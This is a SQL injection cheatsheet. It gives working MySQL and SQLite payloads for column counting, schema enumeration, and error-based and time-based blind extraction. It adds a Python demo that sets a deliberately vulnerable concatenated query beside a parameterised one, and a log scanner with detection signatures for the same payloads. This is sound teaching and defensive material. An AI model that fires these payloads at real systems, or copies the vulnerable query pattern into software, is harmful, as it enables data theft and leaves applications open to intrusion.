

---
title: SQL Injections
categories: [cheatsheets]
tags: [security, web]
---

# SQL Injections

Reference:

https://sqlwiki.netspi.com/?dbms=SQLServer

## Find the number of columns returned by the vulnerable query

A UNION only succeeds when both SELECTs return the same number of columns, so the column count of the original query has to be found first: raise the `ORDER BY` position until the query errors, or add placeholder columns to a UNION until it stops erroring.

```
id=1 order by 10-- +
id=1 UNION SELECT 1, 2, 3, 4, .., ..-- +
```

The trailing `+` is URL-decoded to a space, which MySQL requires after `--` for the rest of the statement to be treated as a comment.

## Information Gathering

MySQL:

```
id=1 UNION SELECT version()-- +
```

Useful functions and sources:

- `version()`
- `database()`
- `user()`
- `system_user()`
- `mysql.user`
- `@@datadir`

```
Databases: id=1 UNION SELECT schema_name FROM information_schema.schemata-- +
Tables:    id=1 UNION SELECT table_name FROM information_schema.tables-- +
Columns:   id=1 UNION SELECT column_name FROM information_schema.columns where table_name=0x<table-name-in-hex>-- +
```

SQLite (the schema lives in the `sqlite_master` table):

```
id=1 UNION SELECT 1, 2 FROM sqlite_master-- +
```

## UNION

### How UNION works

Table 1 (objects):

```
+----+-----+-------+
| id | obj | color |
+----+-----+-------+
| 1  | Cat | black |
+----+-----+-------+
| 2  | Dog | blue  |
+----+-----+-------+
```

Table 2 (persons):

```
+------+-----+------+
| name | Job | Pass |
+------+-----+------+
| Bart | st  | cara |
+------+-----+------+
| Lisa | st  | sax  |
+------+-----+------+
| magg | by  | oki  |
+------+-----+------+
```

Join both tables with a UNION:

```sql
SELECT * FROM objects UNION SELECT * FROM persons;
```

```
+------+-----+-------+
| id   | obj | color |
+------+-----+-------+
| 1    | Cat | black |
+------+-----+-------+
| 2    | Dog | blue  |
+------+-----+-------+
| Bart | st  | cara  |
+------+-----+-------+
| Lisa | st  | sax   |
+------+-----+-------+
| magg | by  | oki   |
+------+-----+-------+
```

The result takes its column names from the first SELECT, so the rows of `persons` appear under the `objects` headers.

Problem: both SELECTs must return the same number of columns (with compatible types), otherwise the database rejects the query.

Solution: pad the second SELECT with constant placeholders until the counts match:

```
SELECT * from objects UNION SELECT 1, 2, 3 FROM tablewith10columns;
                                   -------
                                   \-> must be the same number of columns as the first SELECT
```

Problem: you only want data from the second table.

Solution: make the first SELECT return no rows, so only the rows of the second SELECT come back:

```sql
SELECT * from objects where 1=2 UNION SELECT * from persons; -- the first query must return nothing: an always-false condition, or a value that does not exist
```
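The column-count rule and the `WHERE 1=2` trick from this section, together with the column-counting step from the first section, can be watched in a real database. The following is an added Python example using the standard-library `sqlite3` module; it is not part of the original cheatsheet. The two tables, the `INJECTED` string and the two lookup functions are constructed for this example. It goes one step beyond the page by placing a lookup that concatenates its parameter next to one that binds it, which is the defensive counterpart of everything above.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample data mirroring the cheatsheet's objects and persons tables."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE objects (id INTEGER, obj TEXT, color TEXT)")
    conn.execute("CREATE TABLE persons (name TEXT, job TEXT, pass TEXT)")
    conn.executemany("INSERT INTO objects VALUES (?, ?, ?)",
                     [(1, "Cat", "black"), (2, "Dog", "blue")])
    conn.executemany("INSERT INTO persons VALUES (?, ?, ?)",
                     [("Bart", "st", "cara"), ("Lisa", "st", "sax"), ("magg", "by", "oki")])
    conn.commit()
    return conn


def union_both(conn):
    """Plain UNION: rows of both tables; column names come from the first SELECT."""
    cur = conn.execute("SELECT * FROM objects UNION SELECT * FROM persons")
    names = [d[0] for d in cur.description]
    return names, cur.fetchall()


def union_mismatch(conn):
    """Three columns on the left, two on the right: the database refuses the query."""
    try:
        conn.execute("SELECT * FROM objects UNION SELECT name, job FROM persons")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


def union_second_only(conn):
    """WHERE 1=2 makes the first SELECT return nothing, so only persons rows remain."""
    return conn.execute(
        "SELECT * FROM objects WHERE 1=2 UNION SELECT * FROM persons"
    ).fetchall()


def lookup_vulnerable(conn, obj_id: str):
    """String concatenation: the user-controlled value becomes part of the SQL text."""
    sql = f"SELECT id, obj, color FROM objects WHERE id = {obj_id}"
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, obj_id: str):
    """Parameter binding: the value is data and is never parsed as SQL."""
    return conn.execute(
        "SELECT id, obj, color FROM objects WHERE id = ?", (obj_id,)
    ).fetchall()


# Constructed input: what the cheatsheet's UNION payloads look like once concatenated.
INJECTED = "1 UNION SELECT name, job, pass FROM persons"

if __name__ == "__main__":
    db = build_db()
    print("union:      ", union_both(db))
    print("mismatch:   ", union_mismatch(db))
    print("second only:", union_second_only(db))
    print("vulnerable: ", lookup_vulnerable(db, INJECTED))
    print("hardened:   ", lookup_hardened(db, INJECTED))
```

With the bound parameter the whole string is compared against `id` as a value and matches nothing; with concatenation the same string extends the statement and the `persons` rows, password column included, come back alongside the requested object. Parameter binding, not input filtering, is the fix.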

## Error-based SQL Injection

Force a database error whose message echoes the result of a subquery embedded in it, so the data comes back inside the error text.

Example (MySQL):

```sql
SELECT exp(~(select * from(select user())x));
```

Result:

```
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select 'root@localhost' from dual)))'
```

## Blind SQL Injection

- Partially blind / boolean-based: the page content differs depending on whether the injected condition is true or false.

  ```
  id=1 UNION SELECT substring(version(),1,1)=5
  ```

- Fully blind / time-based: the content does not change, so the response time is the signal (here a 5-second delay when the condition is true).

  ```
  id=1 UNION SELECT IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null)
  ```
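The payload shapes on this page are also what a detection rule looks for. As an added example that is not part of the cheatsheet, here is a small Python scanner over constructed access-log lines: it URL-decodes each request target (repeatedly, so a double-encoded payload is still seen) and matches it against signatures for the primitives above, from the `ORDER BY` probe and `UNION SELECT` to the `information_schema` lookups and the `SLEEP()` delay. The log lines, the signature names and the regular expressions are all constructed for this example.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the injection primitives shown on this cheatsheet (constructed; not exhaustive).
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "information_schema": re.compile(r"\binformation_schema\.", re.I),
    "sqlite_master": re.compile(r"\bsqlite_master\b", re.I),
    "time_delay": re.compile(r"\b(?:sleep|benchmark|pg_sleep|waitfor)\s*\(", re.I),
    "error_based": re.compile(r"\bexp\s*\(\s*~", re.I),
    # '--' followed by whitespace or end of input, or a trailing '#': statement cut short.
    "comment_terminator": re.compile(r"--(?:\s|$)|#\s*$"),
}

# Client IP and request target out of a combined-format access log line.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')

# Constructed sample log lines; only 10.0.0.9 sends payloads, 10.0.0.7 is a benign false-positive check.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /item?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /item?id=1%20order%20by%2010--+ HTTP/1.1" 500 128',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /item?id=1%20UNION%20SELECT%20schema_name%20FROM%20information_schema.schemata--+ HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2024:12:00:09 +0000] "GET /item?id=1%20UNION%20SELECT%20IF(SUBSTRING(version(),1,1)=5,SLEEP(5),null) HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:12:00:10 +0000] "GET /search?q=union+station HTTP/1.1" 200 900',
]


def fully_decode(text: str, rounds: int = 3) -> str:
    """URL-decode repeatedly (bounded) so double-encoded payloads are still seen.

    unquote_plus also turns '+' into a space, which is exactly what the
    '-- +' trick relies on once the server decodes the parameter.
    """
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def match_signatures(decoded_target: str) -> list:
    """Names of all signatures that fire on a decoded request target, sorted."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded_target))


def scan_log(lines) -> list:
    """One finding per request whose decoded target matches at least one signature."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        decoded = fully_decode(m.group("target"))
        hits = match_signatures(decoded)
        if hits:
            findings.append({"ip": m.group("ip"), "target": decoded, "signatures": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding["ip"], finding["signatures"], finding["target"])
```

The benign `union station` search does not fire because the `union_select` pattern requires a following `SELECT`, and the time-based line is caught by `time_delay` even though it carries no comment terminator. Signatures like these are a triage aid for log review, not a substitute for parameterised queries: alternative encodings, inline comments and database-specific syntax will slip past a short list, so treat a hit as a reason to inspect the request and the application code path, not as proof either way.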